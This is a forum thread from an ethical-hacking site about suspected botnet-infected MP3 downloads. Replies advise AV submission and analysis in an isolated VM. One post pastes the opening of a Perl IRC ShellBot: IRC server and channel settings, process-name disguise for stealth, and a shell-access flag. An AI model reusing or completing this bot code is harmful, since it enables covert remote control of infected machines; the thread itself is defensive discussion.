HomeCalendarCertificationsColumnsFeaturesForumResourcesVitals
 
Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.
Lost Password?
No account yet? Register
Who's Online
We have 34 guests online
 
Advertisement

You are here: Home arrow Ethical Hacking Discussions and Related Certificationsarrow Malwarearrow THe website is Evil but what to do??
EH-Net
May 23, 2013, 09:42:09 PM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
   Home   Help Calendar Login Register  
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: THe website is Evil but what to do??  (Read 4002 times)
0 Members and 1 Guest are viewing this topic.
rok
Newbie
*
Offline Offline

Posts: 39


View Profile
« on: January 06, 2009, 05:52:59 AM »
Hello guys,

how are you guys?Ok lets come to the point.OK,I have a situation.I have identified a website.That's a song download website.And They are spreading one virus with those Music files.The site has almost 1200000 members.So they have easily created huge Botnet.And they are still infecting and spreading the virus and making a huge Botnet.Can anyone tell me what can I do here from this situation?I need to exploit the Botnet or the group and need to report it to the Police authority,so what forensic tests I can do.Please suggest and please anyone who wants help me can Ping me.It would be very Nice of ethicalhacker forum.I hope its ethical what I said here.Please help me.And I need it do it first because they might start attacking any point of time.
Logged
jimbob
Guest
« Reply #1 on: January 06, 2009, 06:00:17 AM »
Hi there Rok,
One thing you can do if you have a sample of the malware in question you should submit it to the AV software companies. That way it will be added to their virus signatures so it can be detected.

You have to be certain that it is malware before making any accusations. Many such websites have a usage policy which expressly allows them to install adware/spyware. If a user signs up and accepts the agreement then the activity may be legit. There are lots of resources out there and on the forum for malware analysis, try reading up on them and attempt an analysis if you like. Be careful though, exercise caution and try to keep your lab as isolated as possible.

Regards,
Jim
Logged
rok
Newbie
*
Offline Offline

Posts: 39


View Profile
« Reply #2 on: January 08, 2009, 05:09:00 AM »
Hello Jim,
Thanks for your reply.

Can you give me much more information.I have got here.mp3 files.I want to read the entire code of that .mp3 file.Can you tell me anyways possible and simple enough for that.I assume the attackers may have injected some good amount of coding to that file so that it can join over any IRCD and channel and can work as per the Botmaster.I want to know the codings.It may be encrypted but at this point of time I only have one way to go and that is to look at the codings.Their must be something similar to this....


#!/usr/bin/perl

my @ps = ("/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]");
my $processo = $ps[rand scalar @ps];

$servidor='irc.lol.com' unless $servidor;
my $porta='6667';
my @canais=("#CANAL");
my @adms=("ADMIN");

# Anti Flood ( 6/3 Recomendado )
my $linas_max=10;
my $sleep=3;

my $nick = getnick();
my $ircname = getident2();
my $realname = "windows nt 5.1 build 2600";
#chop (my $realname = `uname -n`);

my $acessoshell = 1;
######## Stealth ShellBot ##########
my $prefixo = "!all";
my $estatisticas = 0;
my $pacotes = 1;
####################################


May be some thing like this...Please help how can I look at the codes of that .mp3 file.
Logged
NickFnord
Full Member
***
Offline Offline

Posts: 117



View Profile WWW
« Reply #3 on: January 08, 2009, 05:59:23 AM »
that's a massive assumption you're making there....

as far as I'm aware - exploits using mp3's are similar to the ones using image files that you asked about in July last year. 

as an mp3 is just a file format (http://en.wikipedia.org/wiki/Mp3#File_structure / http://www.mpgedit.org/mpgedit/mpeg_format/MP3Format.html) the mp3 would have to exploit a specific buffer overflow or some other vulnerability in order to start executing.  I remember something like this happening in winamp a while back, but havn't heard anything recently about this being possible in any popular mp3 players.

you can open the mp3 in a hex editor to see what's in it.  if you think it contains exploit code then you can look at it in a dissassembler or do any number of system level reversing tricks in a virtual machine. 
Logged
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com 		Valid XHTML 1.0! Valid CSS!
Page created in 0.059 seconds with 23 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Advertisement

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.